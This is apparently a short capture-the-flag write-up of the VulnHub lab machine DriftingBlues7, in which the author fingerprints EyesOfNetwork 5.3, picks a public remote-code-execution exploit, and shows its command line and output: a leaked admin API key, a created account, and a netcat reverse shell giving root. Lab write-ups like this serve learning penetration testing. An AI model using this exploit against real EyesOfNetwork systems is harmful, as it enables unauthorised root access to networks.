Vulnhub: DriftingBlues7

DriftingBlues7

Since I couldn’t get any more of the SunCSR boxes to run and there’s nothing new on THM, I took a shot at DriftingBlues7 on VulnHub. It says it is easy and they weren’t kidding; it took me 10 minutes.

Ports

Lots:

PORT STATE SERVICE
22/tcp open ssh
66/tcp open sqlnet
80/tcp open http
111/tcp open rpcbind
443/tcp open https
2403/tcp open taskmaster2000 3306/tcp open mysql
8086/tcp open d-s-n

When I run the detail scan, port 66 is actually a python webserver so I go poke around there; nothing interesting. I check 80/443 and look at the certificate; not interesting. The frontpage is something called EyesOfNetwork. Checking searchsploit:

EyesOfNetwork (EON) 5.0 - Remote Code Execution                                         
EyesOfNetwork (EON) 5.0 - SQL Injection                                                 
EyesOfNetwork (EON) 5.1 - SQL Injection                                                 
EyesOfNetwork - AutoDiscovery Target Command Execution (Metasploit)                     
EyesOfNetwork 5.1 - Authenticated Remote Command Execution                               
EyesOfNetwork 5.3 - File Upload Remote Code Execution                                   
EyesOfNetwork 5.3 - LFI                                                                 
EyesOfNetwork 5.3 - RCE & PrivEsc                                                       
EyesOfNetwork 5.3 - Remote Code Execution                                               

Juicy, but we need a version. I try a dirsearch and get (amongst other things) README.md, which says:

Eyes Of Network web interface 5.3

Okay, so that answers that. I grab the ‘RCE’ exploit shown above, it says txt but it’s actually a python3 script.

Exploit

──(root💀kali)-[/opt/vulnhub/driftingblues7]
└─# python3 exploit.py https://192.168.1.218 -ip 192.168.1.210 -port 1234                                                          2 ⨯
+-----------------------------------------------------------------------------+
| EyesOfNetwork 5.3 RCE (API v2.4.2)                                          |
| 02/2020 - Clément Billac Twitter: @h4knet                                  |
+-----------------------------------------------------------------------------+

[*] EyesOfNetwork login page found
[*] EyesOfNetwork API page found. API version: 2.4.2
[+] Admin user key obtained: 770af9aeda61b3a6ec36f619d5c84b5fd1526b2a368f339d9fd8b5b7c1a611f4
[+] New user h4ker successfully created. ID:2
[+] Successfully authenticated
[+] Discovery job successfully created with ID: 1&review=1" id="completemsg" style="display: none;">
<div class="roundedcorner_success_box">
<div class="roundedcorner_success_top"><div></div></div>
<div class="roundedcorner_success_content">
              Auto-Discovery Complete.  Click to Continue To Reviewing Found Devices
              </div>
<div class="roundedcorner_success_bottom"><div></div></div>
</div></a>
[*]  Spawning netcat listener: 
listening on [192.168.1.210] 1234 ...
connect to [192.168.1.210] from (UNKNOWN) [192.168.1.218] 47190
sh: no job control in this shell
sh-4.2# id
id
uid=0(root) gid=0(root) groups=0(root)
sh-4.2# id;hostname;date
id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
driftingblues.localdomain
Wed May  5 05:57:48 EDT 2021

Wow.